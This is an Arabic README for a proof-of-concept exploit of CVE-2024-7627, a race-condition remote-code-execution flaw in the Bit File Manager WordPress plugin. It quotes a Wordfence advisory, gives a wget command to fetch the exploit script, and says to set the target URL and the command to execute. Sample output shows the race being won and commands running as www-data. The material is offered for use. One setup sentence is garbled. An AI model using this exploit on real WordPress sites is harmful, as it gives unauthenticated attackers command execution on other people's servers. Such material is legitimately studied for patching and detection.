
سكربت إثبات المفهوم لثغرة تنفيذ كود عن بُعد دون مصادقة عبر حالة السباق (CVE-2024-7627) في إضافة Bit File Manager لووردبريس الإصدار 6.0 - 6.5.5
هذا النص البرمجي هو إثبات مفهوم (PoC) لثغرة في ملحق Bit File Manager لووردبريس، الإصدارات 6.0 إلى 6.5.5، والتي تتيح تنفيذ التعليمات البرمجية عن بُعد دون مصادقة عبر استغلال سباق التوقيت (Race Condition) (CVE-2024-7627).
الوصف:
ملحق Bit File Manager لووردبريس عرضة لتنفيذ التعليمات البرمجية عن بُعد في الإصدارات من 6.0 إلى 6.5.5 عبر دالة 'checkSyntax'. ويعود السبب إلى كتابة ملف مؤقت في دليل متاح للعامة قبل إجراء التحقق من الملف. وهذا يتيح للمهاجمين غير المصادق عليهم تنفيذ تعليمات برمجية على الخادم إذا كان المسؤول قد سمح بصلاحيات القراءة للمستخدم الضيف. (من https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/file-manager/bit-file-manager-60-655-unauthenticated-remote-code-execution-via-race-condition)
wget https://raw.githubusercontent.com/siunam321/CVE-2024-7627-PoC/main/poc.py
file-manager قد تم إعدادهما مسبقًا بواسطة المسؤولقم بتحديث القيم targetBaseUrl وfileManagerPostPath و/أو commandToExecute في النص البرمجي poc.py إلى القيمة التي تريدها. ثم قم بتشغيل python3 poc.py لتشغيل نص إثبات المفهوم.
مثال على المخرجات:
└> python3 poc.py
[*] Getting a valid AJAX nonce...
[+] Found the valid AJAX nonce: f3128b289e
[*] Getting a random file's hash via elFinder command "open"...
[+] Found file "wp-config-sample.php" with hash "l1_d3AtY29uZmlnLXNhbXBsZS5waHA"!
[*] Editing file with hash "l1_d3AtY29uZmlnLXNhbXBsZS5waHA" via elFinder command "put" and getting the edited temporary PHP file at "http://localhost/wp-content/uploads/file-managertemp.php"...
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[+] We won the race condition! Here's the PHP payload result:
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
8d3b2776e8a6